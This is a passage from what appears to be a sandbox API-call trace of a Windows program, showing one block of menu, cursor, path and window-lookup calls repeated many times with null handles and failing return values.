hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.343] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.343] GetStockObject (i=6) returned 0x1b00018 [0176.343] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.343] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.343] PathFileExistsW (pszPath=0x0) returned 0 [0176.343] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.343] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.343] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.343] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.343] GetMenu (hWnd=0x0) returned 0x0 [0176.343] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.343] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.343] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.343] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.343] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.343] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.343] GetStockObject (i=6) returned 0x1b00018 [0176.343] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.343] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.343] PathFileExistsW (pszPath=0x0) returned 0 [0176.343] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.343] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.343] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.343] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.343] GetMenu (hWnd=0x0) returned 0x0 [0176.343] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.343] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.343] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.343] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.343] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.343] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.343] GetStockObject (i=6) returned 0x1b00018 [0176.343] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.343] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.343] PathFileExistsW (pszPath=0x0) returned 0 [0176.344] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.344] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.344] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.344] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.344] GetMenu (hWnd=0x0) returned 0x0 [0176.344] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.344] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.344] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.344] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.344] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.344] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.344] GetStockObject (i=6) returned 0x1b00018 [0176.344] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.344] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.344] PathFileExistsW (pszPath=0x0) returned 0 [0176.344] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.344] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.344] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.344] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.344] GetMenu (hWnd=0x0) returned 0x0 [0176.344] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1c6) returned -1 [0176.344] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.344] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.344] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.344] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.344] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.344] GetStockObject (i=6) returned 0x1b00018 [0176.344] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.344] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.344] PathFileExistsW (pszPath=0x0) returned 0 [0176.344] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.344] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.344] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.345] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.345] GetMenu (hWnd=0x0) returned 0x0 [0176.345] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.345] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.345] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.345] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.345] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.345] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.345] GetStockObject (i=6) returned 0x1b00018 [0176.345] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.345] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.345] PathFileExistsW (pszPath=0x0) returned 0 [0176.345] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.345] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.345] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.345] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.345] GetMenu (hWnd=0x0) returned 0x0 [0176.345] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.345] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.345] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.345] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.345] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.345] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.345] GetStockObject (i=6) returned 0x1b00018 [0176.345] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.345] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.345] PathFileExistsW (pszPath=0x0) returned 0 [0176.345] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.345] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.345] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.345] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.345] GetMenu (hWnd=0x0) returned 0x0 [0176.345] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.345] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.345] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.345] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.346] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.346] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.346] GetStockObject (i=6) returned 0x1b00018 [0176.346] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.346] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.346] PathFileExistsW (pszPath=0x0) returned 0 [0176.346] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.346] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.346] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.346] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.346] GetMenu (hWnd=0x0) returned 0x0 [0176.346] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.346] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.346] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.346] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.346] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.346] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.346] GetStockObject (i=6) returned 0x1b00018 [0176.346] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.346] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.346] PathFileExistsW (pszPath=0x0) returned 0 [0176.346] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.346] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.346] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.346] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.346] GetMenu (hWnd=0x0) returned 0x0 [0176.346] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe7) returned -1 [0176.346] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.346] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.346] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.346] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.346] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.346] GetStockObject (i=6) returned 0x1b00018 [0176.346] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.347] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.347] PathFileExistsW (pszPath=0x0) returned 0 [0176.347] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.347] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.347] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.347] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.347] GetMenu (hWnd=0x0) returned 0x0 [0176.347] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.347] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.347] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.347] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.347] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.347] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.347] GetStockObject (i=6) returned 0x1b00018 [0176.347] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.347] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.347] PathFileExistsW (pszPath=0x0) returned 0 [0176.347] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.347] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.347] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.347] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.347] GetMenu (hWnd=0x0) returned 0x0 [0176.347] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.347] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.347] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.347] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.347] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.347] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.347] GetStockObject (i=6) returned 0x1b00018 [0176.347] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.347] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.347] PathFileExistsW (pszPath=0x0) returned 0 [0176.347] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.347] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.348] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.348] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.348] GetMenu (hWnd=0x0) returned 0x0 [0176.348] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.348] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.348] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.348] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.348] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.348] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.348] GetStockObject (i=6) returned 0x1b00018 [0176.348] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.348] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.348] PathFileExistsW (pszPath=0x0) returned 0 [0176.348] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.348] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.348] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.348] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.348] GetMenu (hWnd=0x0) returned 0x0 [0176.348] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.348] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.348] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.348] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.348] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.348] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.348] GetStockObject (i=6) returned 0x1b00018 [0176.348] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.348] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.348] PathFileExistsW (pszPath=0x0) returned 0 [0176.348] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.348] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.348] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.348] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.348] GetMenu (hWnd=0x0) returned 0x0 [0176.348] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x501) returned -1 [0176.349] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.349] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.349] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.349] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.349] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.349] GetStockObject (i=6) returned 0x1b00018 [0176.349] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.349] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.349] PathFileExistsW (pszPath=0x0) returned 0 [0176.349] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.349] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.349] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.349] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.349] GetMenu (hWnd=0x0) returned 0x0 [0176.349] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.349] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.349] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.349] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.349] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.349] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.349] GetStockObject (i=6) returned 0x1b00018 [0176.349] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.349] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.349] PathFileExistsW (pszPath=0x0) returned 0 [0176.349] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.349] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.349] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.349] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.349] GetMenu (hWnd=0x0) returned 0x0 [0176.349] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.349] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.349] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.349] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.349] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.349] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.350] GetStockObject (i=6) returned 0x1b00018 [0176.350] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.350] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.350] PathFileExistsW (pszPath=0x0) returned 0 [0176.350] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.350] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.350] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.350] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.350] GetMenu (hWnd=0x0) returned 0x0 [0176.350] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.350] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.350] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.350] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.350] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.350] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.350] GetStockObject (i=6) returned 0x1b00018 [0176.350] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.350] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.350] PathFileExistsW (pszPath=0x0) returned 0 [0176.350] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.350] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.350] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.350] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.350] GetMenu (hWnd=0x0) returned 0x0 [0176.350] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.350] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.350] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.350] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.350] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.350] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.350] GetStockObject (i=6) returned 0x1b00018 [0176.350] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.350] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.350] PathFileExistsW (pszPath=0x0) returned 0 [0176.350] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.350] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.351] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.351] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.351] GetMenu (hWnd=0x0) returned 0x0 [0176.351] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xbf) returned -1 [0176.351] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.351] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.351] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.351] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.351] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.351] GetStockObject (i=6) returned 0x1b00018 [0176.351] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.351] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.351] PathFileExistsW (pszPath=0x0) returned 0 [0176.351] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.351] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.351] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.351] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.351] GetMenu (hWnd=0x0) returned 0x0 [0176.351] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.351] 